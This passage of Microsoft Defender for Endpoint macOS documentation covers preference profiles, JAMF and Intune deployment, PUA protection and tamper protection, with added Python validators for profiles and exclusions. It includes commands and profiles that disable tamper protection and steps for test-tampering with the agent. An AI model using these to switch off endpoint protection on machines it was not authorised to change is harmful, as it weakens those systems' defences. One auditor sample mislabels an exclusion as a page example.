<dict>
<key>PayloadUUID</key>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
<key>PayloadType</key>
<string>com.microsoft.wdav</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint configuration settings</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>antivirusEngine</key>
<dict>
<key>enforcementLevel</key>
<string>real_time</string>
<key>scanAfterDefinitionUpdate</key>
<true/>
<key>scanArchives</key>
<true/>
<key>maximumOnDemandScanThreads</key>
<integer>1</integer>
<key>exclusions</key>
<array>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<false/>
<key>path</key>
<string>/var/log/system.log</string>
</dict>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<true/>
<key>path</key>
<string>/home</string>
</dict>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<true/>
<key>path</key>
<string>/Users/*/git</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileExtension</string>
<key>extension</key>
<string>pdf</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileName</string>
<key>name</key>
<string>cat</string>
</dict>
</array>
<key>exclusionsMergePolicy</key>
<string>merge</string>
<key>allowedThreats</key>
<array>
<string>EICAR-Test-File (not a virus)</string>
</array>
<key>disallowedThreatActions</key>
<array>
<string>allow</string>
<string>restore</string>
</array>
<key>threatTypeSettings</key>
<array>
<dict>
<key>key</key>
<string>potentially_unwanted_application</string>
<key>value</key>
<string>block</string>
</dict>
<dict>
<key>key</key>
<string>archive_bomb</string>
<key>value</key>
<string>audit</string>
</dict>
</array>
<key>threatTypeSettingsMergePolicy</key>
<string>merge</string>
</dict>
<key>cloudService</key>
<dict>
<key>enabled</key>
<true/>
<key>diagnosticLevel</key>
<string>optional</string>
<key>automaticSampleSubmission</key>
<true/>
<key>automaticDefinitionUpdateEnabled</key>
<true/>
<key>cloudBlockLevel</key>
<string>normal</string>
</dict>
<key>edr</key>
<dict>
<key>tags</key>
<array>
<dict>
<key>key</key>
<string>GROUP</string>
<key>value</key>
<string>ExampleTag</string>
</dict>
</array>
</dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
<key>exclusions</key>
<array>
<dict>
<key>path</key>
<string>/bin/zsh</string>
<key>teamId</key>
<string/>
<key>signingId</key>
<string>com.apple.zsh</string>
<key>args</key>
<array>
<string>/usr/local/bin/test.sh</string>
</array>
</dict>
<dict>
<key>path</key>
<string>/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon</string>
<key>teamId</key>
<string>UBF8T346G9</string>
<key>signingId</key>
<string>IntuneMdmDaemon</string>
</dict>
</array>
</dict>
<key>userInterface</key>
<dict>
<key>hideStatusMenuIcon</key>
<false/>
<key>userInitiatedFeedback</key>
<string>enabled</string>
</dict>
</dict>
</array>
</dict>
</plist>

Property list validation

The property list must be a valid .plist file. This can be checked by executing:

Bash

plutil -lint com.microsoft.wdav.plist

Console

com.microsoft.wdav.plist: OK

If the file is well-formed, the above command outputs OK and returns an exit code of 0.
Otherwise, an error that describes the issue is displayed and the command returns an
exit code of 1.

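plutil -lint only answers whether the XML parses. Before a profile ships, a defender usually also wants to confirm that the settings sit where Defender will read them (the com.microsoft.wdav payload, in the Intune layout) and that the values are ones the product accepts. The following Python script is an added example, not Microsoft tooling; the function names, the set of known top-level keys (taken from the profiles on this page) and the two constructed sample profiles are assumptions.

```python
"""Offline checks for a Defender for Endpoint macOS preferences plist.

Added example, not Microsoft tooling. plutil -lint only answers whether the
XML parses; this script also locates the com.microsoft.wdav settings in
either layout shown on the page (bare JAMF plist, or an Intune profile with
the settings inside PayloadContent) and checks the documented values.
"""
import plistlib

WDAV_DOMAIN = "com.microsoft.wdav"
TAMPER_LEVELS = {"disabled", "audit", "block"}   # values of the enforcement-level setting
THREAT_ACTIONS = {"off", "audit", "block"}       # values of mdatp threat policy set --action
# Top-level settings keys that appear on this page; anything else is flagged for review.
KNOWN_KEYS = {"antivirusEngine", "cloudService", "edr", "tamperProtection", "userInterface", "dlp"}


def is_well_formed(data):
    """True when the bytes parse as a plist, the question plutil -lint answers."""
    try:
        plistlib.loads(data)
        return True
    except Exception:  # InvalidFileException or an expat ParseError
        return False


def find_wdav_settings(plist):
    """Return the dict that carries the Defender settings for both layouts.

    Raises ValueError when an Intune profile has no payload typed
    com.microsoft.wdav: with the wrong preference domain Defender never
    sees the settings at all.
    """
    if "PayloadContent" not in plist:
        return plist  # JAMF layout: settings sit at the top level
    for payload in plist["PayloadContent"]:
        if payload.get("PayloadType") == WDAV_DOMAIN:
            return payload
    raise ValueError(f"no PayloadContent entry with PayloadType {WDAV_DOMAIN}")


def check_settings(settings):
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    for key in sorted(k for k in settings if k not in KNOWN_KEYS and not k.startswith("Payload")):
        findings.append(f"unrecognised top-level key {key!r}; verify it against the settings reference")
    level = settings.get("tamperProtection", {}).get("enforcementLevel")
    if level is None:
        findings.append("tamperProtection/enforcementLevel not set; the product default (audit) applies")
    elif level not in TAMPER_LEVELS:
        findings.append(f"tamperProtection/enforcementLevel {level!r} is not one of {sorted(TAMPER_LEVELS)}")
    elif level != "block":
        findings.append(f"tamperProtection/enforcementLevel is {level!r}; only 'block' stops tampering")
    for entry in settings.get("antivirusEngine", {}).get("threatTypeSettings", []):
        if entry.get("value") not in THREAT_ACTIONS:
            findings.append(f"threatTypeSettings {entry.get('key')!r}: {entry.get('value')!r} "
                            f"is not one of {sorted(THREAT_ACTIONS)}")
    return findings


def validate_plist_bytes(data):
    """Parse (raising on malformed XML, like plutil -lint) and check the settings."""
    return check_settings(find_wdav_settings(plistlib.loads(data)))


# Constructed samples (not from the page): a clean JAMF plist and an Intune
# profile with two mistakes, audit mode and a misspelled PUA action.
SAMPLE_JAMF_OK = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>tamperProtection</key><dict><key>enforcementLevel</key><string>block</string></dict>
<key>antivirusEngine</key><dict><key>threatTypeSettings</key><array>
<dict><key>key</key><string>potentially_unwanted_application</string><key>value</key><string>block</string></dict>
</array></dict>
</dict></plist>
"""

SAMPLE_INTUNE_WEAK = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>PayloadType</key><string>Configuration</string>
<key>PayloadContent</key><array><dict>
<key>PayloadType</key><string>com.microsoft.wdav</string>
<key>tamperProtection</key><dict><key>enforcementLevel</key><string>audit</string></dict>
<key>antivirusEngine</key><dict><key>threatTypeSettings</key><array>
<dict><key>key</key><string>potentially_unwanted_application</string><key>value</key><string>blcok</string></dict>
</array></dict>
</dict></array>
</dict></plist>
"""

if __name__ == "__main__":
    for name, data in (("jamf", SAMPLE_JAMF_OK), ("intune", SAMPLE_INTUNE_WEAK)):
        print(name, "well-formed:", is_well_formed(data))
        for finding in validate_plist_bytes(data):
            print("  -", finding)
```

Run it against the exported .plist (or the .xml you upload to Intune) before deployment; a non-empty list of findings is worth a second look even when plutil reports OK, because a typo in an enforcement level silently leaves the product default in force.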
Configuration profile deployment
Once you've built the configuration profile for your enterprise, you can deploy it
through the management console that your enterprise is using. The following sections
provide instructions on how to deploy this profile using JAMF and Intune.

JAMF deployment
From the JAMF console, open Computers > Configuration Profiles, navigate to the
configuration profile you'd like to use, then select Custom Settings. Create an entry with
com.microsoft.wdav as the preference domain and upload the .plist produced earlier.

Caution

You must enter the correct preference domain (com.microsoft.wdav); otherwise, the
preferences will not be recognized by Microsoft Defender for Endpoint.

Intune deployment
1. Open Devices > Configuration Profiles. Select Create Profile.

2. Choose a name for the profile. Change Platform=macOS to Profile type=Templates and
choose Custom in the template name section. Select Configure.

3. Save the .plist produced earlier as com.microsoft.wdav.xml.

4. Enter com.microsoft.wdav as the custom configuration profile name.

5. Open the configuration profile and upload the com.microsoft.wdav.xml file. (This
file was created in step 3.)

6. Select OK.

7. Select Manage > Assignments. In the Include tab, select Assign to All Users & All
devices.

Caution

You must enter the correct custom configuration profile name; otherwise, these
preferences will not be recognized by Microsoft Defender for Endpoint.

Resources
Configuration Profile Reference (Apple developer documentation)

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Detect and block potentially unwanted applications with Microsoft Defender for Endpoint on macOS
Article • 11/22/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Business
Microsoft Defender for Individuals

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The potentially unwanted application (PUA) protection feature in Microsoft Defender for
Endpoint on macOS can detect and block PUA files on endpoints in your network.

These applications are not considered viruses, malware, or other types of threats, but
might perform actions on endpoints that adversely affect their performance or use. PUA
can also refer to applications that are considered to have a poor reputation.

These applications can increase the risk of your network being infected with malware,
cause malware infections to be harder to identify, and can waste IT resources in cleaning
up the applications.

How it works
Microsoft Defender for Endpoint on macOS can detect and report PUA files. When
configured in blocking mode, PUA files are moved to the quarantine.

When a PUA is detected on an endpoint, Microsoft Defender for Endpoint on macOS
presents a notification to the user, unless notifications have been disabled. The threat
name will contain the word "Application".

Configure PUA protection

PUA protection in Microsoft Defender for Endpoint on macOS can be configured in one
of the following ways:

Off: PUA protection is disabled.
Audit: PUA files are reported in the product logs, but not in the Microsoft Defender
portal. No notification is presented to the user and no action is taken by the
product.
Block: PUA files are reported in the product logs and in the Microsoft Defender portal.
The user is presented with a notification and action is taken by the product.

Warning

By default, PUA protection is configured in Audit mode.

You can configure how PUA files are handled from the command line or from the
management console.

Use the command-line tool to configure PUA protection:

In Terminal, execute the following command to configure PUA protection:

Bash

mdatp threat policy set --type potentially_unwanted_application --action [off|audit|block]

Use the management console to configure PUA protection:
In your enterprise, you can configure PUA protection from a management console, such
as JAMF or Intune, similarly to how other product settings are configured. For more
information, see the Threat type settings section of the Set preferences for Microsoft
Defender for Endpoint on macOS topic.

Test PUA protection:

You can test PUA protection by going to the Potentially unwanted applications (PUA)
demonstration.

Related topics
Set preferences for Microsoft Defender for Endpoint on macOS


Protect macOS security settings with tamper protection
Article • 01/29/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Tamper protection in macOS helps prevent unwanted changes to security settings from
being made by unauthorized users. Tamper protection helps prevent unauthorized
removal of Microsoft Defender for Endpoint on macOS. This capability also helps prevent
important security files, processes, and configuration settings from being tampered with.

Important

Starting March of 2023, Microsoft Defender for Endpoint on macOS will start
respecting the selection for tamper protection applied via the global tamper
protection switch under advanced settings in the Microsoft Defender portal
(https://security.microsoft.com). You can choose to enforce (block/audit/disable)
your own macOS tamper protection settings by using a Mobile Device
Management (MDM) solution such as Intune or JAMF (recommended). If the
tamper protection setting was not enforced via MDM, a local administrator can
continue to manually change the setting with the following command: sudo mdatp
config tamper-protection enforcement-level --value (chosen mode).

You can set Tamper Protection in the following modes:

Mode      Description
Disabled  Tamper protection is completely off.
Audit     Tampering operations are logged, but not blocked. This mode is the default after installation.
Block     Tamper protection is on; tampering operations are blocked.


When tamper protection is set to audit or block mode, you can expect the following
outcomes:

Audit mode:

Actions to uninstall the Defender for Endpoint agent are logged (audited)
Editing/modification of Defender for Endpoint files is logged (audited)
Creation of new files under the Defender for Endpoint location is logged (audited)
Deletion of Defender for Endpoint files is logged (audited)
Renaming of Defender for Endpoint files is logged (audited)

Block mode:

Actions to uninstall the Defender for Endpoint agent are blocked
Editing/modification of Defender for Endpoint files is blocked
Creation of new files under the Defender for Endpoint location is blocked
Deletion of Defender for Endpoint files is blocked
Renaming of Defender for Endpoint files is blocked
Commands to stop the agent (wdavdaemon) fail

Here's an example of a system message in response to a blocked action:

You can configure the tamper protection mode by providing the mode name as
enforcement-level.

Note

The mode change will apply immediately.

If you used JAMF during the initial configuration, then you'll need to update
the configuration using JAMF as well.

Before you begin

Supported macOS versions: Big Sur (11), or later.
Minimum required version for Defender for Endpoint: 101.70.19.
Highly recommended settings:

System Integrity Protection (SIP) enabled. For more information, see Disabling and
Enabling System Integrity Protection.

Use a Mobile device management (MDM) tool to configure Microsoft Defender for
Endpoint.

Ensure that Defender for Endpoint has Full Disk Access authorization.

Note

Having SIP enabled and doing all configuration via MDM is not mandatory, but it is
required for a fully secured machine; otherwise a local admin can still make tampering
changes that macOS manages. For example, enabling TCC (Transparency, Consent &
Control) through a Mobile Device Management solution such as Intune eliminates the
risk of a local admin revoking the Full Disk Access authorization that a global admin
granted.

Configure Tamper Protection on macOS devices

Microsoft Defender evaluates these settings in the following order. If a higher priority
setting is configured, the rest are ignored:

1. Managed configuration profile (tamperProtection/enforcementLevel setting):

JAMF
Intune

2. Manual configuration (with mdatp config tamper-protection enforcement-level --value { disabled|audit|block })

3. If the Tamper Protection flag in the Security Portal is set, the "block" mode is used (in
Preview, not available to all customers)
4. If the machine is licensed, then "audit" mode is used by default
5. If the machine isn't licensed, then Tamper Protection is in the "block" mode

Before you begin

Make sure that your machine is licensed and healthy (corresponding values report
true):

Bash

mdatp health

Console

healthy : true
health_issues : []
licensed : true
...
tamper_protection : "audit"

tamper_protection reports the effective enforcement level.

Manual configuration
1. Use the following command to switch to the most restrictive mode:

Console

sudo mdatp config tamper-protection enforcement-level --value block

Note

You must use a managed configuration profile (deployed via MDM) on production
machines. If a local admin changed the tamper protection mode via a manual
configuration, they can change it to a less restrictive mode at any time as well. If the
tamper protection mode was set via a managed profile, only a global admin will be
able to undo it.

2. Verify the result.

Console

healthy : true
health_issues : []
licensed : true
engine_version : "1.1.19300.3"
app_version : "101.70.19"
org_id : "..."
log_level : "info"
machine_guid : "..."
release_ring : "InsiderFast"
product_expiration : Dec 29, 2022 at 09:48:37 PM
cloud_enabled : true
cloud_automatic_sample_submission_consent : "safe"
cloud_diagnostic_enabled : false
passive_mode_enabled : false
real_time_protection_enabled : true
real_time_protection_available : true
real_time_protection_subsystem : "endpoint_security_extension"
network_events_subsystem : "network_filter_extension"
device_control_enforcement_level : "audit"
tamper_protection : "block"
automatic_definition_update_enabled : true
definitions_updated : Jul 06, 2022 at 01:57:03 PM
definitions_updated_minutes_ago : 5
definitions_version : "1.369.896.0"
definitions_status : "up_to_date"
edr_early_preview_enabled : "disabled"
edr_device_tags : []
edr_group_ids : ""
edr_configuration_version : "20.199999.main.2022.07.05.02-ac10b0623fd381e28133debe14b39bb2dc5b61af"
edr_machine_id : "..."
conflicting_applications : []
network_protection_status : "stopped"
data_loss_prevention_status : "disabled"
full_disk_access_enabled : true

Notice that the "tamper_protection" is now set to "block".

JAMF
Configure the tamper protection mode in the Microsoft Defender for Endpoint configuration
profile by adding the following settings:

XML

<?xml version="1.0" encoding="UTF-8"?>


<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
</dict>
</dict>
</plist>

Note

If you already have a configuration profile for Microsoft Defender for Endpoint then
you need to add settings to it. You should not create a second configuration profile.

Intune

Settings catalog
You can create a new settings catalog profile to add the Tamper protection
configuration, or you can add it to an existing one. The setting "Enforcement level" can
be found under category "Microsoft Defender" and subcategory "Tamper protection".
Afterwards, choose the desired level.

Custom profile
As an alternative, you can also configure Tamper protection via a custom profile. For
more information, see Set preferences for Microsoft Defender for Endpoint on macOS.

Note

For Intune configuration, you can create a new profile configuration file to add the
Tamper protection configuration, or you can add these parameters to the existing
one. Choose the desired level.

XML

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint settings</string>
<key>PayloadDescription</key>
<string>Microsoft Defender for Endpoint configuration
settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<key>PayloadUUID</key>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
<key>PayloadType</key>
<string>com.microsoft.wdav</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint configuration
settings</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
</dict>
</dict>
</array>
</dict>
</plist>

Check status

Check the tamper protection status by running the following command:

Bash

mdatp health --field tamper_protection

The result shows "block" if tamper protection is on:

You can also run the full mdatp health and look for "tamper_protection" in the output.

For extended information on the tamper protection status, run mdatp health --details tamper_protection.

Verify tamper protection preventive capabilities

You can verify that tamper protection is on in various ways.

Verify block mode

A tampering alert is raised in the Microsoft Defender portal

Verify block and audit modes

Using Advanced hunting, you see tampering alerts appear
Tampering events can be found in the local device logs: sudo grep -F '[{tamperProtection}]' /Library/Logs/Microsoft/mdatp/microsoft_defender_core.log

DIY scenarios

With tamper protection set to "block", attempt different methods to uninstall
Defender for Endpoint. For example, drag the app tile into the trash or uninstall
it from the command line.

Try to stop the Defender for Endpoint process (kill).

Try to delete, rename, modify, move Defender for Endpoint files (similar to what a
malicious user would do), for example:
/Applications/Microsoft Defender ATP.app/
/Library/LaunchDaemons/com.microsoft.fresno.plist
/Library/LaunchDaemons/com.microsoft.fresno.uninstall.plist
/Library/LaunchAgents/com.microsoft.wdav.tray.plist
/Library/Managed Preferences/com.microsoft.wdav.ext.plist
/Library/Managed Preferences/mdatp_managed.json
/Library/Managed Preferences/com.microsoft.wdav.atp.plist
/Library/Managed Preferences/com.microsoft.wdav.atp.offboarding.plist
/usr/local/bin/mdatp

Turning off Tamper Protection

You can turn off Tamper Protection using any of the following methods.

Manual configuration
Use the following command:

Console

sudo mdatp config tamper-protection enforcement-level --value disabled

JAMF
Change the enforcementLevel value to "disabled" in your configuration profile, and push
it to the machine:

XML

<?xml version="1.0" encoding="UTF-8"?>


<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>disabled</string>
</dict>
</dict>
</plist>

Intune
Add the following configuration in your Intune profile:

XML

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint settings</string>
<key>PayloadDescription</key>
<string>Microsoft Defender for Endpoint configuration
settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<key>PayloadUUID</key>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
<key>PayloadType</key>
<string>com.microsoft.wdav</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint configuration
settings</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>disabled</string>
</dict>
</dict>
</array>
</dict>
</plist>

Exclusions

Note

Available in version 101.98.71 or newer.

Tamper Protection prevents any macOS process from making changes to Microsoft
Defender's assets or killing Microsoft Defender's processes. Protected assets include
installation and configuration files.

Internally, Microsoft Defender makes exceptions for certain macOS processes under
certain circumstances. As an example, macOS can upgrade Defender's package if
Tamper Protection verifies the package's authenticity. There are other exclusions as well.
For example, the macOS MDM process can replace Microsoft Defender's managed
configuration files.

There are situations when a global administrator needs to restart Defender on all or
some managed machines. Typically it's done by creating and running a JAMF policy
that runs a script on remote machines (or similar operations for other MDM vendors).

To avoid flagging those policy-initiated operations as tampering, Microsoft Defender
detects the MDM policy processes for JAMF and Intune and permits tampering operations
from them. At the same time, Tamper Protection blocks the same script from
restarting Microsoft Defender if it is started locally from a Terminal.

However, those policy-running processes are vendor specific. While Microsoft Defender
provides built-in exclusions for JAMF and Intune, it can't provide those exclusions for all
possible MDM vendors. Instead, a global administrator can add their own exclusions to
Tamper Protection. Exclusions can be configured only through an MDM profile, not local
configuration.

To do that, you first need to find the path to the MDM helper process that runs
policies. You can do this by following the MDM vendor's documentation. You can
also initiate tampering with a test policy, get an alert in the Security Portal, inspect the
hierarchy of processes that initiated the "attack", and pick the process that looks like an
MDM helper candidate.

Once the process path is identified, you have a few choices for how to configure an
exclusion:

By the path itself. It's the simplest (you already have this path) and the least secure
way to do it; in other words, not recommended.
By getting the signing ID from the executable, either TeamIdentifier or signing
Identifier, by running codesign -dv --verbose=4 path_to_helper (look for Identifier
and TeamIdentifier; the latter isn't available for Apple's own tools).
Or by using a combination of those attributes.

Example:

Bash

codesign -dv --verbose=4 /usr/bin/ruby

Console

Executable=/usr/bin/ruby
Identifier=com.apple.ruby
Format=Mach-O universal (x86_64 arm64e)
CodeDirectory v=20400 size=583 flags=0x0(none) hashes=13+2 location=embedded
Platform identifier=14
VersionPlatform=1
VersionMin=852992
VersionSDK=852992
Hash type=sha256 size=32
CandidateCDHash sha256=335c10d40db9417d80db87f658f6565018a4c3d6
CandidateCDHashFull
sha256=335c10d40db9417d80db87f658f6565018a4c3d65ea3b850fc76c59e0e137e20
Hash choices=sha256
CMSDigest=335c10d40db9417d80db87f658f6565018a4c3d65ea3b850fc76c59e0e137e20
CMSDigestType=2
Executable Segment base=0
Executable Segment limit=16384
Executable Segment flags=0x1
Page size=4096
Launch Constraints:
None
CDHash=335c10d40db9417d80db87f658f6565018a4c3d6
Signature size=4442
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
Signed Time=Apr 15, 2023 at 4:45:52 AM
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=1 size=64

Configure preferences, for example for JAMF:

XML

<?xml version="1.0" encoding="UTF-8"?>


<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
<key>exclusions</key>
<array>
<dict>
<key>path</key>
<string>/usr/bin/ruby</string>
<key>teamId</key>
<string/>
<key>signingId</key>
<string>com.apple.ruby</string>
<key>args</key>
<array>
<string>/usr/local/bin/global_mdatp_restarted.rb</string>
</array>
</dict>
</array>
</dict>
</dict>
</plist>

Note that excluding a scripting interpreter (like Ruby in the example above) instead
of a compiled executable isn't secure, as it can run any script, not just the one that a
global admin uses.

To minimize the risk, we recommend using extra args to allow only specific scripts to
run with scripting interpreters. In the example above, only /usr/bin/ruby
/usr/local/bin/global_mdatp_restarted.rb is permitted to restart Defender. But, for
example, /usr/bin/ruby /Library/Application Support/Global Manager/global_mdatp_restarted.rb
or even /usr/bin/ruby /usr/local/bin/global_mdatp_restarted.rb $USER aren't allowed.

Warning

Always use the most restrictive criteria to prevent unexpected attacks!
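
The three ways of identifying a helper (path only, signing identity, a combination) and the interpreter caveat above can be checked mechanically before a profile ships. The following Python auditor is an added example, not part of Defender or of any MDM product; zsh and ruby come from this page's examples, while the other interpreter names, the function names and the two weak sample entries are assumptions.

```python
"""Audit tamperProtection exclusions in a Defender for Endpoint macOS profile.

Added example, not part of Defender. It encodes the page's guidance: a
path-only exclusion is the least secure form, a signing identity should be
used (signingId, plus teamId where the binary has one), and a scripting
interpreter must be pinned to one specific script through args.
"""
import plistlib

# zsh and ruby are the interpreters in the page's examples; the rest are assumptions.
SCRIPT_INTERPRETERS = {"zsh", "sh", "bash", "ruby", "python3", "perl", "osascript"}


def audit_exclusion(entry):
    """Return findings for one exclusion dict (keys path, teamId, signingId, args)."""
    findings = []
    path = entry.get("path") or ""
    team_id = entry.get("teamId") or ""
    signing_id = entry.get("signingId") or ""
    args = entry.get("args") or []
    if not path:
        findings.append("exclusion without a path")
    if not signing_id and not team_id:
        findings.append(f"{path}: path-only exclusion (no signingId/teamId); least secure, not recommended")
    elif not team_id and not signing_id.startswith("com.apple."):
        # Apple's own tools report TeamIdentifier=not set; anything else should pin the team too
        findings.append(f"{path}: signingId without teamId for a non-Apple binary")
    if path.rsplit("/", 1)[-1] in SCRIPT_INTERPRETERS:
        if not args:
            findings.append(f"{path}: scripting interpreter excluded without args; any script could run under it")
        for arg in args:
            if not arg.startswith("/"):
                findings.append(f"{path}: arg {arg!r} is not an absolute path to one script")
    return findings


def audit_exclusions(exclusions):
    """Audit a list of exclusion dicts; returns {path: findings} for the weak ones only."""
    report = {}
    for entry in exclusions:
        findings = audit_exclusion(entry)
        if findings:
            report[entry.get("path") or "<missing path>"] = findings
    return report


def audit_jamf_plist(data):
    """Convenience wrapper for the bare (JAMF) plist layout shown on the page."""
    return audit_exclusions(plistlib.loads(data)["tamperProtection"]["exclusions"])


# Constructed sample: the page's Ruby and JAMF exclusions plus two weak entries.
SAMPLE_EXCLUSIONS = [
    {"path": "/usr/bin/ruby", "teamId": "", "signingId": "com.apple.ruby",
     "args": ["/usr/local/bin/global_mdatp_restarted.rb"]},           # page example
    {"path": "/usr/local/jamf/bin/jamf", "teamId": "483DWKW443",
     "signingId": "com.jamfsoftware.jamf"},                            # page example
    {"path": "/usr/local/bin/mdm-helper", "teamId": "", "signingId": ""},  # constructed: path only
    {"path": "/bin/zsh", "teamId": "", "signingId": "com.apple.zsh"},      # constructed: no args
]

if __name__ == "__main__":
    for path, findings in audit_exclusions(SAMPLE_EXCLUSIONS).items():
        for finding in findings:
            print("-", finding)
```

The Ruby entry passes because it carries a signing identifier and a single absolute script path; the JAMF entry passes because both its team and signing IDs are pinned. The two constructed entries show the failure modes the page warns about.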

Troubleshooting configuration issues

Issue: Tamper protection is reported as disabled


If running the command mdatp health reports that the tamper protection is disabled,
even if you enabled it and more than an hour has passed since the onboarding, then
you can check if you have the right configuration by running the following command:

Bash

mdatp health --details tamper_protection

Console

tamper_protection : "audit"
exclusions :
[{"path":"/usr/bin/ruby","team_id":"","signing_id":"com.apple.ruby","args":
["/usr/local/bin/global_mdatp_restarted.rb"]}] [managed]
feature_enabled_protection : true
feature_enabled_portal : true
configuration_source : "local"
configuration_local : "audit"
configuration_portal : "block"
configuration_default : "audit"
configuration_is_managed : false

tamper_protection is the effective mode. If this mode is the mode you intended to
use, then you're all set.

configuration_source indicates how the Tamper Protection enforcement level is set. It
must match how you configured tamper protection. (If you set its mode through a
managed profile, and configuration_source shows something different, then you
most probably misconfigured your profile.)

mdm - it's configured through a managed profile. Only a global admin can
change it, with an update to the profile.
local - it's configured with the mdatp config command.
portal - the default enforcement level set in the Security Portal is used.
defaults - not configured; the default mode is used.

If feature_enabled_protection is false, then Tamper Protection isn't enabled for
your organization (this happens if Defender doesn't report 'licensed').
If feature_enabled_portal is false, then setting the default mode via the Security Portal
isn't enabled for you yet.
configuration_local, configuration_portal, and configuration_default tell the mode
that would be used if the corresponding configuration channel were used. (As an
example, you can configure Tamper Protection to the "block" mode via an MDM
profile, and configuration_default tells you audit. It only means that if you
remove your profile, and the mode wasn't set with mdatp config or through the
Security Portal, then it uses the default mode, which is audit.)
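
To apply the field descriptions above across a fleet rather than reading each output by eye, the following Python example parses the mdatp health --details tamper_protection output shown above and raises the findings a defender would want on a production machine; it also encodes the evaluation order listed under "Configure Tamper Protection on macOS devices". It is an added example, not part of mdatp; the parsing assumes the output shape shown on this page (one name : value per line, a JSON list for exclusions, an optional trailing [managed] tag), and the function names are assumptions.

```python
"""Parse and assess `mdatp health --details tamper_protection` output.

Added example, not part of mdatp. The parser targets the output shape shown
on the page: one `name : value` per line, quoted strings and true/false,
a JSON list for exclusions (possibly wrapped over several lines) and an
optional trailing [managed] tag. effective_level() encodes the evaluation
order listed under "Configure Tamper Protection on macOS devices".
"""
import json
import re

FIELD_RE = re.compile(r"^(\w+)\s*:\s?(.*)$")   # a field starts at column 0 with its name


def parse_health_details(text):
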